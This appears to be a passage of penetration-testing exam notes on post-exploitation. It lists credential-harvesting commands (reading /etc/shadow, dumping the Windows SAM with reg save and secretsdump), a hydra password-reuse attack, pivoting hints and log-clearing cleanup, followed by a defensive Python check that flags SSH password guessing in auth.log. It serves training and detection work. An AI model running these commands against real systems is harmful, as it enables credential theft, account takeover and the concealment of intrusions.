🧹 Post Exploitation
After gaining access, extract credentials, pivot, and maintain access.
➡️ Environment: See 00_environment_setup
🪪 Credential Harvesting
Linux:
cat /etc/passwd
cat /etc/shadow
grep -r "password" /home/
Windows:
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL
🔁 Password Reuse
hydra -l $USERNAME -P cracked.txt ssh://$IP
🛰️ Pivoting
- Port forward via SSH, chisel, or proxychains
- Enumerate internal subnets from compromised hosts
📝 Evidence Collection
dmesg, auth.log, syslog, bash_history
who, last, w
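The auth.log listed above is also where the hydra password-reuse attempt from the Password Reuse section leaves its trace on the target. As an added example (not part of the original notes), this Python check flags a run of failed SSH password logins that ends in a successful one for the same user and source IP. The log lines, host names, IPs, the function name and the threshold of 3 are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the OpenSSH auth.log format (not from a real host).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web01 sshd[2211]: Failed password for deploy from 10.0.0.5 port 40112 ssh2
Mar  3 10:15:02 web01 sshd[2213]: Failed password for deploy from 10.0.0.5 port 40114 ssh2
Mar  3 10:15:03 web01 sshd[2215]: Failed password for deploy from 10.0.0.5 port 40116 ssh2
Mar  3 10:15:04 web01 sshd[2217]: Failed password for deploy from 10.0.0.5 port 40118 ssh2
Mar  3 10:15:05 web01 sshd[2219]: Accepted password for deploy from 10.0.0.5 port 40120 ssh2
Mar  3 10:20:11 web01 sshd[2301]: Failed password for invalid user admin from 10.0.0.9 port 51000 ssh2
Mar  3 10:22:40 web01 sshd[2320]: Accepted publickey for alice from 10.0.0.7 port 52344 ssh2
Mar  3 10:30:02 web01 sshd[2402]: Failed password for bob from 10.0.0.8 port 53000 ssh2
Mar  3 10:30:09 web01 sshd[2404]: Accepted password for bob from 10.0.0.8 port 53002 ssh2
"""

# Matches sshd authentication results, including the "invalid user" variant.
SSHD_AUTH = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_guessed_logins(log_text, threshold=3):
    """Return [(ip, user, failures)] where at least `threshold` password
    failures for a user from one IP were followed by an accepted password."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        m = SSHD_AUTH.search(line)
        if not m or m["method"] != "password":
            continue  # ignore non-sshd lines and key-based logins
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
        else:
            if failures[key] >= threshold:
                hits.append((m["ip"], m["user"], failures[key]))
            failures[key] = 0  # a successful login ends the failure streak
    return hits

if __name__ == "__main__":
    for ip, user, n in find_guessed_logins(SAMPLE_AUTH_LOG):
        print(f"{user}@{ip}: {n} failed passwords, then success")
```

The check ignores timestamps, so it counts failures across the whole file; on a long-lived log, add a time window before alerting on it.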
🧽 Cleanup
- Remove created users, backdoors, scheduled tasks
- Clear logs if allowed (not for exam)
Next: 08_reporting